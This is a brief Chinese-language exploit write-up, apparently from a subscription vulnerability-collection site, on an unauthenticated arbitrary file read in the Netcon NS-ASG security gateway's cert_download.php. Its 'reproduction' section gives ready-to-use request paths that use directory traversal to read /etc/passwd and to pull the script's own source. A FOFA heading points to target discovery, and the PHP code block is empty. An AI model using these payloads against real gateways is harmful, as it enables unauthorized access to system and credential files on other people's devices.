网康_NS-ASG安全网关_任意文件读取漏洞-棉花糖会员站

# 网康 NS-ASG安全网关任意文件读取漏洞

## 漏洞描述

网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞

## 漏洞影响

> 网康 NS-ASG安全网关

## FOFA

> 网康 NS-ASG安全网关

## 漏洞复现

出现漏洞的文件为 **/admin/cert_download.php**

“`php

“`

此文件没有对身份进行校验即可下载任意文件

“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
“`

![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-1.png)

“`
/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
“`

![](/static/qingy/网康_NS-ASG安全网关_任意文件读取漏洞/img/qax-2.png)

文章版权归作者所有，未经允许请勿转载。

THE END

网康_NS-ASG安全网关_任意文件读取漏洞